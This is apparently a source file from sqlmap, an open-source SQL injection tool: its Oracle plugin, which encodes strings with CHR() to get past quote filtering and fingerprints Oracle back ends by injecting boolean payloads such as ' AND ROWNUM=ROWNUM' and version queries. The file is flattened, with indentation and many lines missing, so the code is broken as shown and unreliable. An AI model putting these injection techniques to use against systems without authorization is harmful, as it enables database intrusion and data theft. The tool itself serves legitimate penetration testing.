$Id: oracle.py 327 2009-01-12 21:35:38Z inquisb $
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from lib.core.agent import agent
from lib.core.common import formatDBMSfp
from lib.core.common import formatFingerprint
from lib.core.common import getHtmlErrorFp
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapSyntaxException
from lib.core.session import setDbms
from lib.core.settings import ORACLE_ALIASES
from lib.core.settings import ORACLE_SYSTEM_DBS
from lib.core.unescaper import unescaper
from lib.request import inject
from lib.request.connect import Connect as Request
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
from plugins.generic.fingerprint import Fingerprint
from plugins.generic.takeover import Takeover
class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
This class defines Oracle methods
self.excludeDbsList = ORACLE_SYSTEM_DBS
Enumeration.__init__(self, "Oracle")
unescaper.setUnescape(OracleMap.unescape)
def unescape(expression, quote=True):
index = expression.find("'")
firstIndex = index + 1
index = expression[firstIndex:].find("'")
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex]
for i in range(firstIndex, lastIndex):
unescaped += "CHR(%d)" % (ord(expression[i]))
expression = expression.replace(old, unescaped)
expression = "||".join("CHR(%d)" % ord(c) for c in expression)
def escape(expression):
index = expression.find("CHR(")
index = expression[firstIndex:].find("))")
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex]
oldUpper = old.upper()
oldUpper = oldUpper.replace("CHR(", "").replace(")", "")
oldUpper = oldUpper.split("||")
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
expression = expression.replace(old, escaped)
def getFingerprint(self):
wsOsFp = formatFingerprint("web server", kb.headersFp)
value += "%s\n" % wsOsFp
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
actVer = formatDBMSfp()
value += "active fingerprint: %s" % actVer
banVer = kb.bannerFp["dbmsVersion"]
banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = getHtmlErrorFp()
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if conf.dbms in ORACLE_ALIASES:
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
logMsg = "testing Oracle"
payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
result = Request.queryPage(payload)
logMsg = "confirming Oracle"
payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
result = Request.queryPage(payload)
warnMsg = "the back-end DMBS is not Oracle"
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
version = inject.getValue(query)
if re.search("^11", version):
kb.dbmsVersion = ["11i"]
elif re.search("^10", version):
kb.dbmsVersion = ["10g"]
elif re.search("^9", version):
kb.dbmsVersion = ["9i"]
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
warnMsg = "the back-end DMBS is not Oracle"
def forceDbmsEnum(self):
conf.db = conf.db.upper()
warnMsg = "on Oracle it is only possible to enumerate "
warnMsg += "if you provide a TABLESPACE_NAME as database "
warnMsg += "name. sqlmap is going to use 'USERS' as database "
conf.tbl = conf.tbl.upper()
warnMsg = "on Oracle it is not possible to enumerate databases"